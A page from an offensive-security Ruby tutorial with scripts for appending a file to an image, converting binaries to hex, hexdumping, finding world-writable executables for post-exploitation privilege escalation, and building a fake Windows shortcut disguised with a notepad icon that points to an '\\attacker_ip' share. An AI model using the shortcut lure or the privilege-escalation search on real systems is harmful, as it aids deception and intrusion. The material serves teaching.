File manipulation

Twitter Github NEW! Black Hat Ruby Buy Me a Coffee
Search…
File manipulation
Simple Steganography
Simple script to hide a file file.pdf in an image image.png then write it into steg.png image which is originally the image.png
Then, it recovers the file.pdf from steg.png to hola.pdf.
1
#!/usr/bin/env ruby
2
# KING SABRI | @KINGSABRI
3
file1, file2 = ARGV
4
sec_file = File.read file1    # 'file.pdf'
5
nor_file = File.read file2    # 'image.png'
6
sep = '*------------------------*'
7
one_file = [nor_file, sep, sec_file]
8
​
9
# Write sec_file, sep, nor_file into steg.png
10
File.open("steg.png", 'wb') do |stg|
11
  one_file.each do |f|
12
    stg.puts f
13
  end
14
end
15
​
16
# Read steg.png to be like "one_file" array
17
recov_file = File.read('steg.png').force_encoding("BINARY").split(sep).last
18
# Write sec_file to hola.pdf
19
File.open('hola.pdf', 'wb') {|file| file.print recov_file}
Copied!
Note: This has nothing to do with bypassing AV.
Simple Binary file to Hex
hex-simple.rb
1
#!/usr/bin/env ruby
2
# KING SABRI | @KINGSABRI
3
# Simple file to hex converter script
4
#
5
file_name = ARGV[0]
6
​
7
file = File.open(file_name , 'rb')
8
file2hex = file.read.each_byte.map { |b| '\x%02x' % b }.join    # b.to_s(16).rjust(2, '0')
9
​
10
puts file2hex
Copied!
1
ruby hex-simple.rb ../assembly/hellolinux
Copied!
Or in one command line
1
ruby -e "puts  File.open('hellolinux').read.each_byte.map { |b| '\x%02X' % b }.join"
Copied!
return
1
\x7F\x45\x4C\x46\x01\x01\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x03\x00\x01\x00\x00\x00\x80\x80\x04\x08\x34\x00\x00\x00\xCC\x00\x00\x00\x00\x00\x00\x00\x34\x00\x20\x00\x02\x00\x28\x00\x04\x00\x03\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x80\x04\x08\x00\x80\x04\x08\xA2\x00\x00\x00\xA2\x00\x00\x00\x05\x00\x00\x00\x00\x10\x00\x00\x01\x00\x00\x00\xA4\x00\x00\x00\xA4\x90\x04\x08\xA4\x90\x04\x08\x0E\x00\x00\x00\x0E\x00\x00\x00\x06\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xB8\x04\x00\x00\x00\xBB\x01\x00\x00\x00\xB9\xA4\x90\x04\x08\xBA\x0D\x00\x00\x00\xCD\x80\xB8\x01\x00\x00\x00\xBB\x00\x00\x00\x00\xCD\x80\x00\x00\x48\x65\x6C\x6C\x6F\x2C\x20\x57\x6F\x72\x6C\x64\x21\x0A\x00\x2E\x73\x68\x73\x74\x72\x74\x61\x62\x00\x2E\x74\x65\x78\x74\x00\x2E\x64\x61\x74\x61\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0B\x00\x00\x00\x01\x00\x00\x00\x06\x00\x00\x00\x80\x80\x04\x08\x80\x00\x00\x00\x22\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00\x00\x11\x00\x00\x00\x01\x00\x00\x00\x03\x00\x00\x00\xA4\x90\x04\x08\xA4\x00\x00\x00\x0E\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xB2\x00\x00\x00\x17\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00
Copied!
Note if want to change the hex prefix from \x to anything, just change '\x%x' to whatever you want, or remove it!.
Simple Hexdump
hexdump.rb
1
#!/usr/bin/env ruby
2
#
3
# Source: http://c2.com/cgi/wiki?HexDumpInManyProgrammingLanguages
4
#
5
def hexdump(filename, start = 0, finish = nil, width = 16)
6
  ascii = ''
7
  counter = 0
8
  print '%06x  ' % start
9
  File.open(filename).each_byte do |c|
10
    if counter >= start
11
      print '%02x ' % c
12
      ascii << (c.between?(32, 126) ? c : ?.)
13
      if ascii.length >= width
14
    puts ascii
15
    ascii = ''
16
    print '%06x  ' % (counter + 1)
17
      end
18
    end
19
    throw :done if finish && finish <= counter
20
    counter += 1
21
  end rescue :done
22
  puts '   ' * (width - ascii.length) + ascii
23
end
24
​
25
if $0 == __FILE__
26
  if ARGV.empty?
27
    hexdump $0
28
  else
29
    filename = ARGV.shift
30
    hexdump filename, *(ARGV.map {|arg| arg.to_i })
31
  end
32
end
Copied!
1
ruby hexdump.rb hellolinux
Copied!
return
1
000000  7f 45 4c 46 01 01 01 00 00 00 00 00 00 00 00 00 .ELF............
2
000010  02 00 03 00 01 00 00 00 80 80 04 08 34 00 00 00 ............4...
3
000020  cc 00 00 00 00 00 00 00 34 00 20 00 02 00 28 00 ........4. ...(.
4
000030  04 00 03 00 01 00 00 00 00 00 00 00 00 80 04 08 ................
5
000040  00 80 04 08 a2 00 00 00 a2 00 00 00 05 00 00 00 ................
6
000050  00 10 00 00 01 00 00 00 a4 00 00 00 a4 90 04 08 ................
7
000060  a4 90 04 08 0e 00 00 00 0e 00 00 00 06 00 00 00 ................
8
000070  00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
9
000080  b8 04 00 00 00 bb 01 00 00 00 b9 a4 90 04 08 ba ................
10
000090  0d 00 00 00 cd 80 b8 01 00 00 00 bb 00 00 00 00 ................
11
0000a0  cd 80 00 00 48 65 6c 6c 6f 2c 20 57 6f 72 6c 64 ....Hello, World
12
0000b0  21 0a 00 2e 73 68 73 74 72 74 61 62 00 2e 74 65 !...shstrtab..te
13
0000c0  78 74 00 2e 64 61 74 61 00 00 00 00 00 00 00 00 xt..data........
14
0000d0  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
15
0000e0  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
16
0000f0  00 00 00 00 0b 00 00 00 01 00 00 00 06 00 00 00 ................
17
000100  80 80 04 08 80 00 00 00 22 00 00 00 00 00 00 00 ........".......
18
000110  00 00 00 00 10 00 00 00 00 00 00 00 11 00 00 00 ................
19
000120  01 00 00 00 03 00 00 00 a4 90 04 08 a4 00 00 00 ................
20
000130  0e 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 ................
21
000140  00 00 00 00 01 00 00 00 03 00 00 00 00 00 00 00 ................
22
000150  00 00 00 00 b2 00 00 00 17 00 00 00 00 00 00 00 ................
23
000160  00 00 00 00 01 00 00 00 00 00 00 00             ............
Copied!
Finding weak file permissions
One of the important task to do post exploitation is find weak executable file permissions which might be executed buy root/administrator user trying to elevate our privileges on the system. At the same time, our scripts must be applicable for all systems
find777.rb
1
# KING SABRI | @KINGSABRI
2
# Find all executable, writable files in the path
3
#
4
require 'find'
5
​
6
path = ARGV[0]
7
​
8
search = Find.find(path)
9
​
10
def wx_file(search)
11
  search.select do |file|
12
    File.file?(file) && File.executable?(file) && File.writable?(file)
13
  end  
14
end
15
​
16
puts wx_file search
Copied!
You can search for read, write, execute permissions, so your iteration block will be like
1
  search.select do |file|
2
    File.stat(file).mode.to_s(8)[-3..-1].to_i == 777
3
  end
Copied!
Create Fake Windows shortcut 
Install win32-shortcut gem 
1
gem install win32-shortcut
Copied!
Note: this example works only on windows since it uses Windows APIs
1
# KING SABRI | @KINGSABRI
2
# gem install win32-shortcut
3
require 'win32/shotcut'
4
include Win32
5
​
6
Shortcut.new() do |s|
7
  s.description   = 'Rubyfu'
8
  s.path          = '\\attacker_ip\rubyfu.png'
9
  s.show_cmd      = Shortcut::SHOWNORMAL
10
  s.icon_location = 'notepad.exe'
11
end
Copied!
Module 0x2 | System Kung Fu
Parsing HTML, XML, JSON
Last modified 3yr ago
Copy link
Contents
Simple Steganography
Simple Binary file to Hex
Simple Hexdump
Finding weak file permissions
Create Fake Windows shortcut